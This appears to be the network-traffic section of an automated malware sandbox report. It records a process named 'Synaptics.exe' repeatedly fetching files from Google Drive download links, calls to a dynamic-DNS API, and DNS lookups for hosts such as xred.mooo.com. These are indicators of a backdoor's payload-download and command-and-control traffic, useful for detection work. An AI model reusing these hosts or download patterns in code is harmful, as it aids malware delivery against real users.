                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                            Source: global trafficDNS traffic detected: DNS query: filedn.com
                            Source: global trafficDNS traffic detected: DNS query: docs.google.com
                            Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                            Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                            Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gqH_5P2dg1lzu6zYdU7_i8IFefIi5c2G5YDybH0WHYRNB4dJssRO7RiBEbGr-PG2yContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:02 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-Lu71e4tdMJWXdd3e7yhq_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=KxSTD3Psbm-1FeyxlGzxUd69mJk2UyOFs6ZKOzqzvzhYXYgmp8Hn0rQU_vERd0o40vybDS0HuQNK9CRDdl-U5zri2WP2lR6Z37R4U69VsSoul7LnJrISRFJjNZKKLvjgg2WiLhAwKkkmajzOwbKvcEdMsj-1k0uMHX2f4nb5HgDGLyZmiPuGt70; expires=Tue, 01-Jul-2025 10:51:02 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4zmnUC77fN-icLI1Lryc1bnELifeoUlIOFp-grJ55gwbn0GAE95VgzI8NxTPuP9Q-FContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:02 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-1xg04g2Tk33xh3meyteroA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=dbP6m55jOXmeVvqf-7qrAR5nN00yk5-K2vW_Lpg8QyEEmyYAEb7WZbn2-VL6F7gw223sN9c-SdEQElGxRoejvcg5joy6HyynSuxtgMaGou9ZayiFWm5NmnXs-YzZKaWL928ckLLAGkuaTJNA-zjQjYOyBK5qxNRt_7QjX5pDLyjaoYfpZWA-5Aae; expires=Tue, 01-Jul-2025 10:51:02 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
